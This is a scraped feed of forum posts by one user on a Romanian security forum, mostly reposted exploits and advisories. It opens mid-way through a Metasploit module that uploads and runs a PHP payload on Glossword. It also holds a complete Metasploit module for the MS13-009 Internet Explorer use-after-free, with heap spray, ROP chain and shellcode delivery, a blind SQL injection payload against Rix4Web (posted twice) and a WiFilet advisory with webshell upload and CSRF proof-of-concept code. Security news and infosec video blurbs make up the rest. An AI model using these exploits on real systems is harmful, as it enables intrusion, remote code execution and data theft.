fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end # retrieve PHP file path print_status("#{@peer} - Locating PHP payload file") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'gw_admin.php?a=edit-own&t=users'), 'cookie' => "sid#{token}=#{sid}" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ shell_uri = "#{$1}" @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') print_good("#{@peer} - Found payload file path (#{shell_uri})") else fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path") end # retrieve and execute PHP payload print_status("#{@peer} - Executing payload (#{shell_uri})") begin send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, shell_uri), }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if !res or res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Executing payload failed") end end end Surs?: Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability
  11. Kwelwild
    Rix4Web Portal - Blind SQL Injection Vulnerability ################################################ ### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability ### Date: 02/23/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.rix4web.com/ ### Software Link: http://www.traidnt.net/vb/traidnt2230161/ ### Tested on: Linux/Windows ################################################ # AND time-based blind In POST: POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr. # Just inject : dir_link ################################################ # Greetz To My Friendz Surs?: Rix4Web Portal - Blind SQL Injection Vulnerability
  12. Kwelwild
    WiFilet version 1.2 suffers from cross site request forgery, local file inclusion, and remote shell upload vulnerabilities. Title: ====== WiFilet v1.2 iPad iPhone - Multiple Web Vulnerabilities Date: ===== 2013-02-22 References: =========== http://www.vulnerability-lab.com/get_content.php?id=867 VL-ID: ===== 867 Common Vulnerability Scoring System: ==================================== 6.3 Introduction: ============= WiFilet will makes your iPhone/iPad a mobile disk,you can use browsers upload or download files between iPhone/iPad and PC through WIFI. * Easily sync musics between computers and play them directly. * Easily browse photo libraries via a web browser. * Simple & handy UI * Progress of the uploading files * Open files(like images,word,excel,ppt etc.) directly in your device * Share files by Email attachment * Password protection * ... (Copy of the Homepage: https://itunes.apple.com/de/app/wifilet/id492512158 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the mobile WiFilet v1.2 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-22: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: WiFilet (WiFi) Application (iPad & iPhone) 1.2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== A local file include and arbitrary file upload web vulnerability via POST request method is detected in the mobile WiFilet v1.2 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. 1.1 The main vulnerbility is located in the upload file script of the webserver (http://192.168.0.10:9999/) when processing to load a manipulated filename via POST request method. The execution of the injected path or file request will occur when the attacker is watching the file index listing of the wifi web application web-server. 1.1.2 Remote attackers can also unauthorized implement mobile webshells by using multiple file extensions (pentest.php.js.gif) when processing to upload (submit) via POST request method. The attacker uploads a file with a double extension and access the file in the secound step via directory webserver dir listing to compromise the apple iphone or ipad. Exploitation of the local file include web vulnerability does not require user interaction and also no privileged user account. Successful exploitation of the web vulnerabilities results in app/service manipulation and ipad or iphone compromise via file include or unauthorized file (webshell) upload attacks. Vulnerable Application(s): [+] WiFilet v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload via Submit (Web Server) [Remote] Vulnerable Parameter(s): [+] file > filename Affected Module(s): [+] File Dir Index - Listing 1.2 A cross site request forgery web vulnerability is detected in the mobile WiFilet v1.2 app for the apple ipad & iphone. The vulnerability allows remote attackers to form manipulated links or scripts to execute application functions when processing to load client side requests in the web browser. The vulnerability is located in the application delete module and the not secure parsed file parameter. Remote attacker can force application users with not expired session to execute application function when processing to click a manipulated link. Exploitation of the vulnerability requires medium or high user interaction without privileged application user account. Successful exploitation of the vulnerability result in account steal via client side session hijacking, client site phishing, or client-side content request manipulation. Vulnerable Application(s): [+] WiFilet v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Delete Vulnerable Module(s): [+] file Affected Module(s): [+] File Dir - Listing Proof of Concept: ================= Both vulnerabilities can be exploited by remote attackers without privileged application user account and also without required user interaction. For demonstration or reproduce ... 1.1 Local File/Path Include Web Vulnerability Review: Index Listing <tr><td title="../[FILE OR PATH REQUEST]<.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=6">../[FILE OR PATH REQUEST].png</a></td><td style="text-align:center;">2013-02-10 18:46</td> <td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr> PoC: --- Session Log --- [{"bytes":233966,"id":7,"name":"8765434.png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"228,48 KB"},{"bytes":27920,"id":6,"name":"../[FILE OR PATH REQUEST].png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},{"bytes":27920,"id":5,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},{"bytes":27920,"id":4,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"}] ... or http://192.168.0.10:9999/photo?u=../[FILE OR PATH REQUEST]< Reference(s): http://192.168.0.10:9999/ http://192.168.0.10:9999/list?p=&t=1360518361029 1.1.2 Local File Upload Web Vulnerability Review: Index Listing <tbody> <tr><td title="../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp"><img src="/img/ext/file.png" align="absmiddle"> <a href="/../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp">../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp</a></td> <td style="text-align:center;">2013-02-10 18:53</td><td>File</td><td><div title="98139" align="right">95,84 KB</div></td> <td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("8")">Delete</button></td></tr> <tr><td title="8765434.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=7">8765434.png</a></td> <td style="text-align:center;">2013-02-10 18:46</td><td>PNG Image</td><td><div title="233966" align="right">228,48 KB</div></td> <td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("7")">Delete</button></td></tr><tr><td title="327.png"> <img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=6">327.png</a></td><td style="text-align:center;"> 2013-02-10 18:46</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr><tr><td title="327.png"> <img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=5">327.png</a></td><td style="text-align:center;"> 2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("5")">Delete</button></td></tr><tr><td title="327.png"> <img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=4">327.png</a></td><td style="text-align:center;"> 2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("4")">Delete</button></td></tr> </tbody> Reference(s): http://192.168.0.10:9999/ 1.2 The client side cross site request forgery web vulnerability can be exploited by remote attackers without application user account and with medium or high required user interaction. For demonstration or reproduce ... <html> <head><body> <title>POC CSRF - Delete Files Exploit</title> <Referer=http://192.168.0.10:9999/delete?f=9> <Referer=http://192.168.0.10:9999/delete?f=9> <Referer=http://http://192.168.0.10:9999/delete?f=1> <Referer=http://http://192.168.0.10:9999/delete?f=2> <Referer=http://http://192.168.0.10:9999/delete?f=3> <Referer=http://http://192.168.0.10:9999/delete?f=4> <Referer=http://http://192.168.0.10:9999/delete?f=5> <Referer=http://http://192.168.0.10:9999/delete?f=6> <Referer=http://http://192.168.0.10:9999/delete?f=7> <Referer=http://http://192.168.0.10:9999/delete?f=8> <Referer=http://http://192.168.0.10:9999/delete?f=9> <Referer=http://http://192.168.0.10:9999/delete?f=10> </body></head> </html> Risk: ===== 1.1 The security risk of local path/file include web vulnerability via POST request method is estimated as critical. 1.1.2 The security risk of the arbitrary file upload web vulnerability via POST request method is estimated as high(+). 1.2 The security risk of the cross site request forgery web vulnerability via POST request method is estimated as low(+). Credits: ======== Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Surs? original?: http://www.vulnerability-lab.com/get_content.php?id=867 Surs?: WiFilet 1.2 CSRF / LFI / Shell Upload ? Packet Storm
  13. Kwelwild
    Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul Multi utilizatori din Romania s-au plans de acest scam in weekend. Un nou scam aparut pe Facebook ii indeamna pe romani sa dea click pe un link ca sa vada cine le-a vizualizat profilul. Din pacate, toti curiosii care au facut asta, s-au trezit cu contul infectat. Aceasta amenintare s-a extins puternic in weekend in Romania. Specialistii in securitate informatica sustin ca astfel de scamuri sunt vechi, insa cu toate acestea numarul celor care pica in plasa ramane ridicat. Ei mai spun ca nicio aplicatie de la Facebook nu iti permite sa vezi persoanele care iti vizualizeaza informatiile trecute in profil. Prin urmare, toate postarile care iti promit asa ceva sunt false. “Nicio aplicatie legitima de Facebook nu le permite utilizatorilor sa vada cine le vizualizeaza profilul. Acest scam duce la o frauda care, dupa nenumarate sondaje, ii redirectioneaza pe utilizatori catre premii false cu telefoane de ultima generatie. Escrocherii de acest gen circula de ani de zile in retelele sociale, dar continua sa faca victime printre utilizatori, indiferent de experienta sau varsta. Ele se bazeaza pe mecanisme de inginerie sociala si pe stimuli psihologici care ii provoaca pe oameni sa dea repede click, fara sa se gandeasca la consecinte. Cine nu isi doreste un premiu in schimbul unui singur like pe Facebook? Scamul fura Token-urile de acces (access tokens) ale unei aplicatii legitime de fotografii, apoi posteaza in numele utilizatorilor, accesandu-le datele personale. Aplicatia periculoasa se raspandeste usor printre prietenii victimei, care sunt etichetati automat la postarea mesajului. Bitdefender blocheaza linkul periculos, pe care l-a marcat ca frauda”, spune Catalin Cosoi, Chief Security Strategist la Bitdefender Romania. Surs?: Un nou virus de Facebook ia amploare in Romania. Iti promite ca iti arata cine ti-a vazut profilul - www.yoda.ro
  14. Kwelwild

    Salut tuturor

    Kwelwild replied to k0x's topic in Bine ai venit

    OffTopic: O s? i?i las un link care i?i va schimba atitudinea pu?in dup? ce cite?ti. Click OnTopic: Bine ai venit!
  15. Kwelwild
    Description: In this video I will show you how to use Babelweb tool for HTTP server scanning for the auditing. Babelweb is a program which allows to automate tests on a HTTP server. It is able to follow the links and the HTTP redirect but it is programmed to remain on the original server. The main goal of babelweb is to obtain informations about a remote web server and to sort these informations. It is thus possible to draw up the list of the accessible pages, the cgi scripts met, the various files found like .zip, .pdf... Babelweb is written by Stéphane Aubert. HSC - Tools - Babelweb Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Babelweb - Server Tester
  16. Kwelwild
    Description: In this video I will show you how to use Social Engineering toolkit for the phishing attack and how to send a phishing mail for the credentials Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Fake Email + Phishing Social Engineering Toolkit
  17. Kwelwild
    Updated to include Microsoft comment Security software companies must be smiling ear to ear as they read the news briefs coming off the transom. Microsoft said today that an undetermined number of computers in its Mac software business unit got infected with malware. The company said the number of infected PCs was small but that there was no indication customer data had been compromised. In a blog post late Friday, Matt Thomlinson, who directs the company's Trustworthy Computing Security program at Microsoft, wrote: Consistent with our security response practices, we chose not to make a statement during the initial information gathering process. During our investigation, we found a small number of computers, including some in our Mac business unit, that were infected by malicious software using techniques similar to those documented by other organizations. We have no evidence of customer data being affected and our investigation is ongoing. This type of cyberattack is no surprise to Microsoft and other companies that must grapple with determined and persistent adversaries (see our prior analysis of emerging threat trends). We continually re-evaluate our security posture and deploy additional people, processes, and technologies as necessary to help prevent future unauthorized access to our networks. Welcome to the new normal. The escalating number of reported attacks was underscored by a recent report on malware put together by McAfee which reported that the number of trojans created to steal passwords rose about 72 percent in the last quarter. Last week Apple said that an unknown number of Macs had been compromised, but that "there was no evidence any data left Apple." The malware was tied back to a site targeting iPhone developers. Employee computers for Facebook and most likely dozens of other companies were also breached. The incidents occurred roughly around the same time that The New York Times, The Wall Street Journal, and The Washington Post disclosed that outsiders had also targeted their employees' computers. Surs?: Add Microsoft to list of hacked companies | Security & Privacy - CNET News
  18. Kwelwild
    Description: In this episode of TekTip we take a look at performing basic static analysis with MASTIFF. While that is the focus of this episode I wanted to delve into Maltrieve first. Maltrieve is a fork of MWCrawler which you guys and gals may remember from a previous TekTip video. Maltrieve was created by Kyle Maxwell @KyleMaxwell. While it has the same basic function of MWCrawler which is downloading malware from various web resources, it works much faster and has more reliable web resources it pulls from. @KyleMaxwell is working to add thug integration as well. MASTIFF is an automated framework for static analysis created by Tyler Hudak @SecShoggath and was funded by the Cyber Fast Track DARPA program. Too bad Cyber Fast track is going away, there are so many awesome projects coming out of it right now. What MASTIFF will do is it will analyze a file to determine the file type (pdf, zip, PE32) and based on that file type it will run the appropriate static analysis tools against the sample. The output for tools it runs are organized and packaged up with some key information also making its way to a sqllite database. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Tektip Ep23 - Mastiff With A Splash Of Maltrieve
  19. Kwelwild
    Description: In This video we continue with the DOM Based XSS attack Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://vimeo.com/60358223 Surs?: Web Apps Security Series Part 3 - Dom Based Xss
  20. Kwelwild
    Description: In this video I have explained how to used honeyd to create Honeypot Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Honeypot Uisng Honeyd
  21. Kwelwild
    Contul de Twitter al hackerilor de la Anonymous a fost spart Atacul asupra contului Anonymous vine dupa o serie de actiuni similare, care au vizat conturile Burger King, Jeep si pe cel al prezentatorului Top Gear, Jeremy Clarkson. In acest caz, atacul asupra contului Anonymous a fost revendicat de o grupare putin cunoscuta, numita Rustle League. Graham Cluley, expert in securitatea informatica de la firma Sophos, declara ca motivul pentru care aceste conturi sunt usor de spart il reprezinta parolele folosite, usor de identificat. Acelasi sfat este dat si de conducerea Twitter, care ii sfatuieste pe utilizatori sa inventeze parole mai inteligente, scrie BBC News. O parola sigura trebuie sa aiba cel putin 10 caractere, sa contina litere mici si majuscule, numere si simboluri. Contul @Anon_Central, al gruparii Anonymous, a fost spart timp de 3 ore, joi dimineata. Surs?: Gruparea Anonymous, lovita de alti hackeri. Cine a lansat atacul - www.yoda.ro
  22. Kwelwild

    Regula Market

    Kwelwild replied to 3mPtY's topic in Sugestii

    Conteaz? ?i vechimea ?i num?rul posturilor pentru a vedea interesul persoanei pentru aceast? comunitate. Dac? cineva are cont din 2008 (de exemplu tu), ?i cu 2-3 posturi în care nici administratorul nu a auzit de tine, cum vrei s? intrii la market? Cum ne d?m seama dac? e?ti de încredere sau nu? Îmi pot face un cont acum, iar peste ceva ani buni intru la market ?i zic c? vreau s? schimb LR in PP. Cine are încredere? Regulile sunt reguli.
  23. Kwelwild
    Description: A lot of times we download shellcode from sites like [ Shell-Storm.org ] | Home | and http://exploit-db.com but have no clue what that do. We believe what the shellcode description says and we are happy to run it. Would you trust a hacker? In this video, we look at the first step on how to systematically run and analyze shellcode. In course of this video, we will discover that the shellcode in question uses a JMP-CALL-POP technique and uses XOR encoding to hide the real shellcode. We then move on to find the two syscalls it makes setreuid and execve. Upon analysis of the arguments of the syscall, we figure out that the shellcode after decoding itself, runs "/bin/ksh" Link to Shellcode: Linux/x86 - setreuid (0,0) & execve(/bin/ksh, [/bin/ksh, NULL]) + XOR encoded - 53 bytes Shellcode Author: https://twitter.com/@egeektronic Surs?: Hack Of The Day: How Do I Run Untrusted Shellcode?
      • 1
      • Upvote
  24. Kwelwild
    This Metasploit module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module ], 'References' => [ [ 'CVE', '2013-0025' ], [ 'MSB', 'MS13-009' ], [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ] ], 'Payload' => { 'BadChars' => "\x00", 'Space' => 920, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 13 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # ROP chain generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_nops = [0x77c39f92].pack("V") * 11 # RETN rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) rop_payload << rop_nops rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN rop_payload << [0x77c39f92].pack("V") # RETN rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset rop_payload << code end return rop_payload end def get_exploit(my_target, cli) p = get_payload(my_target, cli) js = heap_spray(my_target, p) html = %Q| <!doctype html> <html> <head> <script> #{js} </script> <script> var data; var objArray = new Array(1150); setTimeout(function(){ document.body.style.whiteSpace = "pre-line"; CollectGarbage(); for (var i=0;i<1150;i++){ objArray[i] = document.createElement('div'); objArray[i].className = data += unescape("%u0c0c%u0c0c"); } setTimeout(function(){document.body.innerHTML = "boo"}, 100) }, 100) </script> </head> <body> <p> </p> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = get_exploit(my_target, cli) html = html.gsub(/^\t\t/, '') print_status "Sending HTML..." send_response(cli, html, {'Content-Type'=>'text/html'}) end end Surs?: MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free ? Packet Storm
  25. Kwelwild
    Rix4Web Portal suffers from a remote SQL injection vulnerability. ################################################ ### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability ### Date: 02/23/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.rix4web.com/ ### Software Link: http://www.traidnt.net/vb/traidnt2230161/ ### Tested on: Linux/Windows ################################################ # AND time-based blind In POST: POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr. # Just inject : dir_link ################################################ # Greetz To My Friendz Surs?: Rix4Web Portal Remote Blind SQL Injection ? Packet Storm
×
×
  • Create New...